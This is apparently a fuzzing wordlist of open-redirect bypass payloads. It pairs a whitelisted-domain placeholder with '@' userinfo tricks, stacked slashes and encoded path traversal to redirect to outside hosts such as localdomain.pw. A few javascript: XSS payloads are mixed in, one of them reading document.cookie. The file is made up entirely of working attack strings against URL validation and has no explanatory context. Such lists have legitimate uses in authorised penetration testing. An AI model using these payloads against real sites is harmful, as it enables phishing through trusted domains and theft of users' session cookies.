///www.whitelisteddomain.tld@google.com/%2f..
//www.whitelisteddomain.tld@google.com/%2f..
//www.whitelisteddomain.tld@https:///localdomain.pw/%2e%2e
//www.whitelisteddomain.tld@https:///www.google.com/%2e%2e
////www.whitelisteddomain.tld@localdomain.pw/
////www.whitelisteddomain.tld@localdomain.pw//
///www.whitelisteddomain.tld@localdomain.pw/
///www.whitelisteddomain.tld@localdomain.pw//
//www.whitelisteddomain.tld@localdomain.pw/
//www.whitelisteddomain.tld@localdomain.pw//
////www.whitelisteddomain.tld@localdomain.pw/%2e%2e
///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
////www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
///www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
//www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
////www.whitelisteddomain.tld@localdomain.pw/%2f..
///www.whitelisteddomain.tld@localdomain.pw/%2f..
//www.whitelisteddomain.tld@localdomain.pw/%2f..
////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
//www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
//www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
////www.whitelisteddomain.tld@www.google.com/%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2e%2e
////www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
///www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
//www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
//www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/x:1/:///%01javascript:alert(document.cookie)/
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
//XY>.7d8T\205pZM@example.com+@example.com/
//XY>.7d8T\205pZM@example.com@example.com/
//XY>.7d8T\205pZM@example.com+@google.com/
//XY>.7d8T\205pZM@example.com@google.com/
//XY>.7d8T\205pZM@%whitelist%+@localdomain.pw/
//XY>.7d8T\205pZM@%whitelist%@localdomain.pw/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
//XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
